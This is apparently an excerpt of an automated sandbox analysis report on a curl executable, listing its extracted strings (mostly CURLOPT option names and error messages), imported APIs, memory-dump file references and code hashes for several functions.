CURLOPT_FTP_ACCOUNT, xrefs: 00409D10
CURLOPT_SEEKFUNCTION, xrefs: 00408774
curl: (%d) %s, xrefs: 00407EAD
Metalink: fetching (%s) from (%s) OK, xrefs: 0040B735
SSL_CERT_FILE, xrefs: 0040AB7A
CURLOPT_FTPPORT, xrefs: 00409138
CURLOPT_MAX_RECV_SPEED_LARGE, xrefs: 00409238
CURLOPT_HTTP_VERSION, xrefs: 0040B358
Using --anyauth or --proxy-anyauth with upload from stdin involves a big risk of it not working. Use a temporary file or a fixed auth type instead!, xrefs: 0040A446
,, xrefs: 0040B88C
fcntl failed on fd=%d: %s, xrefs: 0040A684
CURLOPT_WRITEDATA, xrefs: 00408661
Failed to open %s, xrefs: 0040AB61
CURLOPT_RANDOM_FILE, xrefs: 00409A48
SSL_CERT_DIR, xrefs: 0040AB21
CURLOPT_KEYPASSWD, xrefs: 004093B3
CURLOPT_LOCALPORTRANGE, xrefs: 0040AE70
CURLOPT_XFERINFODATA, xrefs: 0040B0E2
(', xrefs: 0040B381
CURLOPT_HTTP_CONTENT_DECODING, xrefs: 0040AD3F
error retrieving curl library information, xrefs: 00407708
`hF, xrefs: 00409787
CURLOPT_GSSAPI_DELEGATION, xrefs: 0040B9A1
CURLOPT_FTP_CREATE_MISSING_DIRS, xrefs: 00409BF7
CURLOPT_SSLKEYTYPE, xrefs: 00409377
CURLOPT_HEADERFUNCTION, xrefs: 00409FB6
CURLOPT_USE_SSL, xrefs: 0040AEBF
out of memory, xrefs: 0040A892, 0040A927, 0040AA8D, 0040AAB8, 0040B8F1
CURLOPT_READDATA, xrefs: 004086B8
CURLOPT_PROXYAUTH, xrefs: 0040B3DD
CURLOPT_RESOLVE, xrefs: 0040A033
CURLOPT_MAXFILESIZE_LARGE, xrefs: 0040AF24
CURLOPT_MAIL_RCPT, xrefs: 00409F24
hF, xrefs: 0040974B
CURLOPT_MAIL_FROM, xrefs: 00409EE4
CURLOPT_TIMEOUT_MS, xrefs: 00408E11
no URL specified!, xrefs: 00407B6E
:MFKF, xrefs: 00408FEF
CURL_CA_BUNDLE, xrefs: 0040AA04
CURLOPT_HTTPAUTH, xrefs: 0040B31D
CURLOPT_SSLCERTTYPE, xrefs: 004092FF
Metalink: fetching (%s) from (%s) FAILED (HTTP status code %d), xrefs: 0040B859
CURLOPT_MAXREDIRS, xrefs: 0040906A
Transient problem: %s Will retry in %ld seconds. %ld retries left., xrefs: 0040A254
failed to truncate, exiting, xrefs: 0040A34D
CURLOPT_TIMECONDITION, xrefs: 00409797
CURLOPT_VERBOSE, xrefs: 0040AFD3
https://, xrefs: 0040AE0F
CURLOPT_TRANSFER_ENCODING, xrefs: 0040B2DA
CURLOPT_CAINFO, xrefs: 00409408
CURLOPT_SASL_IR, xrefs: 0040B927
CURLOPT_HEADERDATA, xrefs: 00409FF3
curl: Saved to filename '%s', xrefs: 0040A20A
CURLOPT_SSLKEY, xrefs: 0040933B
CURLOPT_DEBUGFUNCTION, xrefs: 0040AF63
CURLOPT_MAX_SEND_SPEED_LARGE, xrefs: 004091F2
CURLOPT_TELNETOPTIONS, xrefs: 00409A17
CURLOPT_TRANSFERTEXT, xrefs: 00408CD4
CURLOPT_LOW_SPEED_LIMIT, xrefs: 00409174
CURLOPT_SSH_KNOWNHOSTS, xrefs: 0040B27E
curl-ca-bundle.crt, xrefs: 0040AB90
CURLOPT_KRBLEVEL, xrefs: 004098BB
CURLOPT_ACCEPT_ENCODING, xrefs: 0040B414
CURLOPT_CRLFILE, xrefs: 00409488
CURLOPT_FTP_ALTERNATIVE_TO_USER, xrefs: 00409E1C
CURLOPT_SSL_OPTIONS, xrefs: 0040B966
CURLOPT_TIMEVALUE, xrefs: 004097CB
(%d) Failed writing body, xrefs: 004081E5
CURLOPT_LOGIN_OPTIONS, xrefs: 00408D21
CURLOPT_HTTPHEADER, xrefs: 00409036
CURLOPT_XFERINFOFUNCTION, xrefs: 0040B0AC
CURLOPT_HEADER, xrefs: 004088B2
%s/%sssh/known_hosts, xrefs: 0040B250
CURLOPT_BUFFERSIZE, xrefs: 0040A9AE
CURLOPT_POSTFIELDSIZE_LARGE, xrefs: 00408F41
CURLOPT_XOAUTH2_BEARER, xrefs: 004088F2
%s/?%s, xrefs: 0040A5F8
CURLOPT_DNS_SERVERS, xrefs: 00409923
CURLOPT_TCP_NODELAY, xrefs: 00408624
CURLOPT_HTTPPOST, xrefs: 0040B389
://, xrefs: 0040854A
Metalink: fetching (%s) from (%s) FAILED (%s), xrefs: 0040B55E
error initializing curl library, xrefs: 004076D9
CURLOPT_FTP_USE_EPRT, xrefs: 0040B012
host, xrefs: 00407ABA
CURLOPT_HTTP_TRANSFER_DECODING, xrefs: 0040AD79
CURLOPT_NOPROXY, xrefs: 00408AE9
CURLOPT_QUOTE, xrefs: 004095C0
CURLOPT_DNS_LOCAL_IP4, xrefs: 004099A3
CURLOPT_NOBODY, xrefs: 0040B894
CURLOPT_DNS_LOCAL_IP6, xrefs: 004099E3
CURLOPT_SSLENGINE, xrefs: 00409B87
CURLOPT_FAILONERROR, xrefs: 00408B27
CURLOPT_SSH_HOST_PUBLIC_KEY_MD5, xrefs: 0040B1D2
`jF, xrefs: 0040B30D, 0040B3CD
CURLOPT_MAIL_AUTH, xrefs: 0040A156
CURLOPT_CAPATH, xrefs: 00409448
CURLOPT_FTP_SSL_CCC, xrefs: 00409CDC
CURLOPT_TLSAUTH_PASSWORD, xrefs: 0040A0BA
CURLOPT_FTP_SKIP_PASV_IP, xrefs: 00409D91
error initializing curl easy handle, xrefs: 00407B0F
CURLOPT_REFERER, xrefs: 00408F7E
CURLOPT_TLSAUTH_TYPE, xrefs: 0040A0FA
CURLOPT_SEEKDATA, xrefs: 0040873A
http://, xrefs: 0040AC76
CURLOPT_PROXY, xrefs: 00408926, 00408A33
[%lu/%lu]: %s --> %s, xrefs: 004084FA
CURLOPT_COOKIEJAR, xrefs: 004096DF
CURLOPT_EGDSOCKET, xrefs: 00409A81
CURLOPT_IPRESOLVE, xrefs: 00409C6C
CURLOPT_URL, xrefs: 0040880C
CURLOPT_CONNECTTIMEOUT_MS, xrefs: 00409AC7
o, xrefs: 0040B3D5
CURLOPT_PROXYUSERPWD, xrefs: 00408962
CURLOPT_CRLF, xrefs: 0040957F
CURLOPT_DEBUGDATA, xrefs: 0040AF99
CURLOPT_DIRLISTONLY, xrefs: 00408BAE
CURLOPT_COOKIEFILE, xrefs: 004096A2
CURLOPT_AUTOREFERER, xrefs: 00408FBC
CURLOPT_NOPROGRESS, xrefs: 0040884A
CURLOPT_NETRC, xrefs: 00408C66
CURLOPT_TCP_KEEPIDLE, xrefs: 0040ACBC
CURLOPT_INFILESIZE_LARGE, xrefs: 004087C7
CURLOPT_FTP_USE_EPSV, xrefs: 0040B051
?, xrefs: 0040857A
<stdout>, xrefs: 004084ED
CURLOPT_ERRORBUFFER, xrefs: 00408DD6
CURLOPT_USERPWD, xrefs: 00408D55
CURLOPT_RANGE, xrefs: 00408D91
If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like, xrefs: 0040A713
CURLOPT_APPEND, xrefs: 00408BF1
CURLOPT_FTP_FILEMETHOD, xrefs: 00409DD2
iF, xrefs: 0040B348
v', xrefs: 0040B40C
CURLOPT_UPLOAD, xrefs: 00408B6B
option %s: %s, xrefs: 00407AF0
CURLOPT_FILETIME, xrefs: 0040B121
CURLOPT_SSL_VERIFYPEER, xrefs: 004094DF, 0040B22A
CURLOPT_SSLENGINE_DEFAULT, xrefs: 00409BC1
CURLOPT_TCP_KEEPINTVL, xrefs: 0040ACF8
Throwing away %I64d bytes, xrefs: 0040A2E5
CURLOPT_INTERFACE, xrefs: 0040987F
%s%c%s, xrefs: 00408592
CURLOPT_READFUNCTION, xrefs: 00408704
bad output glob!, xrefs: 0040A831
%s%s, xrefs: 0040A637
CURLOPT_RESUME_FROM_LARGE, xrefs: 0040928F
CURLOPT_WRITEFUNCTION, xrefs: 0040A537
xkF, xrefs: 004089E3, 00408A5F
CURLOPT_CUSTOMREQUEST, xrefs: 00409807
CURLOPT_SSLVERSION, xrefs: 0040975B
CURLOPT_SSL_SESSIONID_CACHE, xrefs: 0040ADB8
--url, xrefs: 00407826
CURLOPT_SSL_VERIFYHOST, xrefs: 00409515
CURLOPT_SSL_CIPHER_LIST, xrefs: 00409B23
CURLOPT_STDERR, xrefs: 00409843
http, xrefs: 0040B6F9, 0040B7DB
CURLOPT_POSTFIELDS, xrefs: 00408F05
CURLOPT_LOW_SPEED_TIME, xrefs: 004091B0
CURLOPT_POSTQUOTE, xrefs: 004095F4
CURLOPT_SSH_PUBLIC_KEYFILE, xrefs: 0040B196
CURLOPT_DNS_INTERFACE, xrefs: 00409963
--_curl_--, xrefs: 0040A62F
CURLOPT_FTP_USE_PRET, xrefs: 0040AC01
CURLOPT_PROXYTYPE, xrefs: 004089F3, 00408A6F
CURLOPT_IGNORE_CONTENT_LENGTH, xrefs: 00409D4E
CURLOPT_PROTOCOLS, xrefs: 0040ABC2
CURLOPT_POSTREDIR, xrefs: 004090EE
CURLOPT_SSLCERT, xrefs: 004092C3
`gF, xrefs: 0040AEAF
CURLOPT_SSH_PRIVATE_KEYFILE, xrefs: 0040B15A
CURLOPT_UNRESTRICTED_AUTH, xrefs: 00408EB3
Remote file name has no length!, xrefs: 0040A96C
CURLOPT_USERAGENT, xrefs: 00408FFA
CURLOPT_FOLLOWLOCATION, xrefs: 00408E70
More details here: http://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate f, xrefs: 0040A71B
CURLOPT_REDIR_PROTOCOLS, xrefs: 0040B9DF
CURLOPT_LOCALPORT, xrefs: 0040AE3C
Error setting extended attributes: %s, xrefs: 0040B618
Can't open '%s'!, xrefs: 0040A4D1, 0040A802, 0040A8DD
CURLOPT_COOKIESESSION, xrefs: 00409712
CURLOPT_NETRC_FILE, xrefs: 00408C9E
CURLOPT_TFTP_BLKSIZE, xrefs: 0040AC3C
CURLOPT_TCP_KEEPALIVE, xrefs: 00409E88, 0040ADF3
%s%s, xrefs: 0040A723
CURLOPT_TLSAUTH_USERNAME, xrefs: 0040A07A
CURLOPT_PREQUOTE, xrefs: 00409628

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: curl_global_initcurl_mfprintfcurl_mvfprintffwrite
String ID: [%lu/%lu]: %s --> %s$%s%c%s$%s%s$%s%s$%s/%sssh/known_hosts$%s/?%s$(%d) Failed writing body$('$,$--_curl_--$--url$:MFKF$://$<stdout>$?$CURLOPT_ACCEPT_ENCODING$CURLOPT_APPEND$CURLOPT_AUTOREFERER$CURLOPT_BUFFERSIZE$CURLOPT_CAINFO$CURLOPT_CAPATH$CURLOPT_CONNECTTIMEOUT_MS$CURLOPT_COOKIE$CURLOPT_COOKIEFILE$CURLOPT_COOKIEJAR$CURLOPT_COOKIESESSION$CURLOPT_CRLF$CURLOPT_CRLFILE$CURLOPT_CUSTOMREQUEST$CURLOPT_DEBUGDATA$CURLOPT_DEBUGFUNCTION$CURLOPT_DIRLISTONLY$CURLOPT_DNS_INTERFACE$CURLOPT_DNS_LOCAL_IP4$CURLOPT_DNS_LOCAL_IP6$CURLOPT_DNS_SERVERS$CURLOPT_EGDSOCKET$CURLOPT_ERRORBUFFER$CURLOPT_FAILONERROR$CURLOPT_FILETIME$CURLOPT_FOLLOWLOCATION$CURLOPT_FTPPORT$CURLOPT_FTP_ACCOUNT$CURLOPT_FTP_ALTERNATIVE_TO_USER$CURLOPT_FTP_CREATE_MISSING_DIRS$CURLOPT_FTP_FILEMETHOD$CURLOPT_FTP_SKIP_PASV_IP$CURLOPT_FTP_SSL_CCC$CURLOPT_FTP_USE_EPRT$CURLOPT_FTP_USE_EPSV$CURLOPT_FTP_USE_PRET$CURLOPT_GSSAPI_DELEGATION$CURLOPT_HEADER$CURLOPT_HEADERDATA$CURLOPT_HEADERFUNCTION$CURLOPT_HTTPAUTH$CURLOPT_HTTPHEADER$CURLOPT_HTTPPOST$CURLOPT_HTTPPROXYTUNNEL$CURLOPT_HTTP_CONTENT_DECODING$CURLOPT_HTTP_TRANSFER_DECODING$CURLOPT_HTTP_VERSION$CURLOPT_IGNORE_CONTENT_LENGTH$CURLOPT_INFILESIZE_LARGE$CURLOPT_INTERFACE$CURLOPT_IPRESOLVE$CURLOPT_KEYPASSWD$CURLOPT_KRBLEVEL$CURLOPT_LOCALPORT$CURLOPT_LOCALPORTRANGE$CURLOPT_LOGIN_OPTIONS$CURLOPT_LOW_SPEED_LIMIT$CURLOPT_LOW_SPEED_TIME$CURLOPT_MAIL_AUTH$CURLOPT_MAIL_FROM$CURLOPT_MAIL_RCPT$CURLOPT_MAXFILESIZE_LARGE$CURLOPT_MAXREDIRS$CURLOPT_MAX_RECV_SPEED_LARGE$CURLOPT_MAX_SEND_SPEED_LARGE$CURLOPT_NETRC$CURLOPT_NETRC_FILE$CURLOPT_NOBODY$CURLOPT_NOPROGRESS$CURLOPT_NOPROXY$CURLOPT_POSTFIELDS$CURLOPT_POSTFIELDSIZE_LARGE$CURLOPT_POSTQUOTE$CURLOPT_POSTREDIR$CURLOPT_PREQUOTE$CURLOPT_PROTOCOLS$CURLOPT_PROXY$CURLOPT_PROXYAUTH$CURLOPT_PROXYTYPE$CURLOPT_PROXYUSERPWD$CURLOPT_QUOTE$CURLOPT_RANDOM_FILE$CURLOPT_RANGE$CURLOPT_READDATA$CURLOPT_READFUNCTION$CURLOPT_REDIR_PROTOCOLS$CURLOPT_REFERER$CURLOPT_RESOLVE$CURLOPT_RESUME_FROM_LARGE$CURLOPT_SASL_IR$CURLOPT_SEEKDATA$CURLOPT_SEEKFUNCTION$CURLOPT_SSH_HOST_PUBLIC_KEY_MD5$CURLOPT_SSH_KNOWNHOSTS$CURLOPT_SSH_PRIVATE_KEYFILE$CURLOPT_SSH_PUBLIC_KEYFILE$CURLOPT_SSLCERT$CURLOPT_SSLCERTTYPE$CURLOPT_SSLENGINE$CURLOPT_SSLENGINE_DEFAULT$CURLOPT_SSLKEY$CURLOPT_SSLKEYTYPE$CURLOPT_SSLVERSION$CURLOPT_SSL_CIPHER_LIST$CURLOPT_SSL_OPTIONS$CURLOPT_SSL_SESSIONID_CACHE$CURLOPT_SSL_VERIFYHOST$CURLOPT_SSL_VERIFYPEER$CURLOPT_STDERR$CURLOPT_TCP_KEEPALIVE$CURLOPT_TCP_KEEPIDLE$CURLOPT_TCP_KEEPINTVL$CURLOPT_TCP_NODELAY$CURLOPT_TELNETOPTIONS$CURLOPT_TFTP_BLKSIZE$CURLOPT_TIMECONDITION$CURLOPT_TIMEOUT_MS$CURLOPT_TIMEVALUE$CURLOPT_TLSAUTH_PASSWORD$CURLOPT_TLSAUTH_TYPE$CURLOPT_TLSAUTH_USERNAME$CURLOPT_TRANSFERTEXT$CURLOPT_TRANSFER_ENCODING$CURLOPT_UNRESTRICTED_AUTH$CURLOPT_UPLOAD$CURLOPT_URL$CURLOPT_USERAGENT$CURLOPT_USERPWD$CURLOPT_USE_SSL$CURLOPT_VERBOSE$CURLOPT_WRITEDATA$CURLOPT_WRITEFUNCTION$CURLOPT_XFERINFODATA$CURLOPT_XFERINFOFUNCTION$CURLOPT_XOAUTH2_BEARER$CURL_CA_BUNDLE$Can't open '%s'!$Error setting extended attributes: %s$Failed to open %s$If this HTTPS server uses a certificate signed by a CA represented in the bundle, the certificate verification probably failed due to a problem with the certificate (it might be expired, or the name might not match the domain name in the URL).If you'd like$Keep-alive functionality somewhat crippled due to missing support in your operating system!$Metalink: fetching (%s) from (%s) FAILED (%s)$Metalink: fetching (%s) from (%s) FAILED (HTTP status code %d)$Metalink: fetching (%s) from (%s) OK$More details here: http://curl.haxx.se/docs/sslcerts.htmlcurl performs SSL certificate verification by default, using a "bundle" of Certificate Authority (CA) public keys (CA certs). If the default bundle file isn't adequate, you can specify an alternate f$Remote file name has no length!$SSL_CERT_DIR$SSL_CERT_FILE$Throwing away %I64d bytes$Transient problem: %s Will retry in %ld seconds. %ld retries left.$Using --anyauth or --proxy-anyauth with upload from stdin involves a big risk of it not working. Use a temporary file or a fixed auth type instead!$`gF$`hF$`jF$bad output glob!$curl-ca-bundle.crt$curl: (%d) %s$curl: Saved to filename '%s'$error initializing curl easy handle$error initializing curl library$error retrieving curl library information$failed to truncate, exiting$fcntl failed on fd=%d: %s$host$http$http://$https://$no URL specified!$o$option %s: %s$out of memory$proxy$v'$xkF$gF$hF$iF
API String ID: 3204274685-4217227449
Opcode ID: e584c881a72078699d3836d0b083fefc53b084bc97cdb0fcd169542bf407fab0
Instruction ID: 27bb1df172a5e14b11361fa4790f26cf05d3f25503ea478baab36357e0f8033a
Opcode Fuzzy Hash: e584c881a72078699d3836d0b083fefc53b084bc97cdb0fcd169542bf407fab0
Instruction Fuzzy Hash: 8B83D6B09093419FD760DF65C58475BBBE0BF84748F11892EE898AB381E778D944CB8B

Function 00415170 Relevance: 65.3, APIs: 19, Strings: 18, Instructions: 587
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

Local Interface %s is ip %s using address family %i, xrefs: 0041560E
Could not set TCP_NODELAY: %s, xrefs: 004159B5
if!, xrefs: 0041558C
Failed to set SO_KEEPALIVE on fd %d, xrefs: 00415988
%, xrefs: 00415AE1
Failed to set SIO_KEEPALIVE_VALS on fd %d: %d, xrefs: 00415468
host!, xrefs: 00415878
Couldn't bind to interface '%s', xrefs: 00415BD4
TCP_NODELAY set, xrefs: 004154D7
Local port: %hu, xrefs: 00415771
Immediate connect fail for %s: %s, xrefs: 00415C58
Name '%s' family %i resolved to '%s' family %i, xrefs: 00415943
sa_addr inet_ntop() failed with errno %d: %s, xrefs: 00415520
Bind to local port %hu failed, trying next, xrefs: 004156C9
getsockname() failed with errno %d: %s, xrefs: 004159FD
bind failed with errno %d: %s, xrefs: 00415817
Couldn't bind to '%s', xrefs: 00415866
Trying %s..., xrefs: 004151F7

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: memcpy
String ID: Trying %s...$%$Bind to local port %hu failed, trying next$Could not set TCP_NODELAY: %s$Couldn't bind to '%s'$Couldn't bind to interface '%s'$Failed to set SIO_KEEPALIVE_VALS on fd %d: %d$Failed to set SO_KEEPALIVE on fd %d$Immediate connect fail for %s: %s$Local Interface %s is ip %s using address family %i$Local port: %hu$Name '%s' family %i resolved to '%s' family %i$TCP_NODELAY set$bind failed with errno %d: %s$getsockname() failed with errno %d: %s$host!$if!$sa_addr inet_ntop() failed with errno %d: %s
API String ID: 3510742995-752006192
Opcode ID: 9a87a3a190e888646a4a81777dc74533b1a1e252203f5cca49df0a12fc3f5494
Instruction ID: 216912530a2d822a39c2557e6cd530e4251f152d1b51dc069be0e1b8e7b9ea4a
Opcode Fuzzy Hash: 9a87a3a190e888646a4a81777dc74533b1a1e252203f5cca49df0a12fc3f5494
Instruction Fuzzy Hash: B452C2B0905715DFCB20DF65C9887DABBF4BF88344F1089AEE88897311D7789A858F46

Function 00401179 Relevance: 18.2, APIs: 12, Instructions: 207
sleepstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Sleep.KERNEL32 ref: 00401210
SetUnhandledExceptionFilter.KERNEL32 ref: 00401291
malloc.MSVCRT ref: 0040133F
strlen.MSVCRT ref: 00401366
malloc.MSVCRT ref: 00401371
memcpy.MSVCRT ref: 0040138D
GetStartupInfoA.KERNEL32 ref: 00401473

Memory Dump Source

Source File: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: malloc$ExceptionFilterInfoSleepStartupUnhandledmemcpystrlen
String ID:
API String ID: 649803965-0
Opcode ID: dcc7dd8c832a854a31c4a3c92f990870877a6d9670b2c2a3b13168821679b555
Instruction ID: b9ee0ee4d59422b566c7009c853ed29ce5bd29c6f03f35968766e850dfdf76ce
Opcode Fuzzy Hash: dcc7dd8c832a854a31c4a3c92f990870877a6d9670b2c2a3b13168821679b555
Instruction Fuzzy Hash: 4E81ADB19046418FD710EF6DD88076A7BF1FB45349F01487ED848AB3B2D7789888CB9A

Function 00414440 Relevance: 10.8, APIs: 7, Instructions: 288
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e70803677c983d20cca8df981d5446e95550df8009f6179daa62e8382f55c764
Instruction ID: 8eedf11b12e9ac29d9c63e2e3d0ff32db6ca8daf448a8fa9b73a91044a6b4010
Opcode Fuzzy Hash: e70803677c983d20cca8df981d5446e95550df8009f6179daa62e8382f55c764
Instruction Fuzzy Hash: B7B17D71A002189BCB25DF69D8803DAB7F5BFC4324F1485ABD95897340E738AEC58F99

Function 00416880 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 55networkCOMMON

Download Yara Rule

APIs

recv.WS2_32 ref: 004168AF
WSAGetLastError.WS2_32 ref: 004168D2

Strings

Recv failure: %s, xrefs: 004168ED

Memory Dump Source

Source File: 00000005.00000002.1941771839.0000000000402000.00000080.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true

Associated: 00000005.00000002.1941692373.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941749319.0000000000401000.00000020.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941818747.0000000000454000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941849066.0000000000477000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941869046.0000000000478000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.0000000000479000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941886351.000000000047C000.00000008.00000001.01000000.00000008.sdmpDownload File
Associated: 00000005.00000002.1941942500.000000000047D000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_curl.jbxd

Similarity

API ID: ErrorLastrecv
String ID: Recv failure: %s
API String ID: 2514157807-4276829032
Opcode ID: 3d40bf542a226067e7e0235d0875adbc419b764381e17ac3922294db9840aac3
Instruction ID: d7ea4122cc1c36649762b674caf87a13aebeb42d5802ef35900f2a376bdcd078
Opcode Fuzzy Hash: 3d40bf542a226067e7e0235d0875adbc419b764381e17ac3922294db9840aac3
Instruction Fuzzy Hash: 2A111CB4A053049FC710EF68D88869ABBE4FB48364F01896AF99887350D775D854CB96

Function 0040A64C Relevance: 260.9, APIs: 33, Strings: 115, Instructions: 1931stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00413E40: ioctlsocket.WS2_32 ref: 00413E68

curl_mfprintf.CURL(?), ref: 00407EBE
fclose.MSVCRT ref: 00407EED
curl_easy_getinfo.CURL(?), ref: 00407F40
_utime.MSVCRT ref: 00407F73
free.MSVCRT(?), ref: 00407F91
free.MSVCRT(?), ref: 00407FBF
free.MSVCRT(?), ref: 00407FDD

Part of subcall function 0040D870: curl_easy_setopt.CURL ref: 0040D955
Part of subcall function 0040D870: free.MSVCRT ref: 0040D9BC

_fileno.MSVCRT ref: 004084A3
_isatty.MSVCRT ref: 004084AB
curl_mfprintf.CURL(?), ref: 00408526
strstr.MSVCRT ref: 00408555
strrchr.MSVCRT ref: 0040856D
strchr.MSVCRT ref: 00408585
curl_maprintf.CURL(?), ref: 004085A8
free.MSVCRT(?), ref: 004085C5
curl_easy_perform.CURL(?), ref: 0040A1D4
curl_mprintf.CURL(?), ref: 0040A211
curl_mfprintf.CURL(?), ref: 0040A2F6
fflush.MSVCRT ref: 0040A305
_fileno.MSVCRT ref: 0040A322
curl_mfprintf.CURL(?), ref: 0040A35E
_errno.MSVCRT ref: 0040A66C
strerror.MSVCRT ref: 0040A677

Part of subcall function 0040D870: strcmp.MSVCRT ref: 0040D8B8
Part of subcall function 0040D870: curl_msnprintf.CURL ref: 0040D8E3
Part of subcall function 0040D870: curl_easy_setopt.CURL ref: 0040D8FA

free.MSVCRT(?), ref: 0040B440

Part of subcall function 0040D870: curl_msnprintf.CURL ref: 0040DA37
Part of subcall function 0040D870: curl_easy_setopt.CURL ref: 0040DA52

Part of subcall function 0040D720: curl_easy_setopt.CURL ref: 0040D73D

free.MSVCRT(?), ref: 0040B452

Part of subcall function 00402260: curl_getenv.CURL ref: 004022C4
Part of subcall function 00402260: strtol.MSVCRT ref: 004022E2
Part of subcall function 00402260: strlen.MSVCRT ref: 004022F6
Part of subcall function 00402260: curl_free.CURL ref: 0040230B

curl_easy_strerror.CURL(?), ref: 0040B543
curl_mfprintf.CURL(?), ref: 0040B573
_fileno.MSVCRT ref: 0040B5EB
_errno.MSVCRT ref: 0040B608
strerror.MSVCRT ref: 0040B613
fputc.MSVCRT ref: 0040B652
curl_easy_getinfo.CURL(?), ref: 0040B698
curl_easy_getinfo.CURL(?), ref: 0040B6DD
curl_mfprintf.CURL(?), ref: 0040B74A
curl_easy_getinfo.CURL(?), ref: 0040B76E

Strings

CURLOPT_HTTPPROXYTUNNEL, xrefs: 004089A0
gF, xrefs: 00409CCC
CURLOPT_COOKIE, xrefs: 00409665
CURLOPT_FTP_ACCOUNT, xrefs: 00409D10
CURLOPT_SEEKFUNCTION, xrefs: 00408774
V', xrefs: 00409A0F
CURLOPT_FTPPORT, xrefs: 00409138
CURLOPT_MAX_RECV_SPEED_LARGE, xrefs: 00409238
fcntl failed on fd=%d: %s, xrefs: 0040A684
CURLOPT_WRITEDATA, xrefs: 00408661
CURLOPT_RANDOM_FILE, xrefs: 00409A48
CURLOPT_KEYPASSWD, xrefs: 004093B3
`hF, xrefs: 00409787
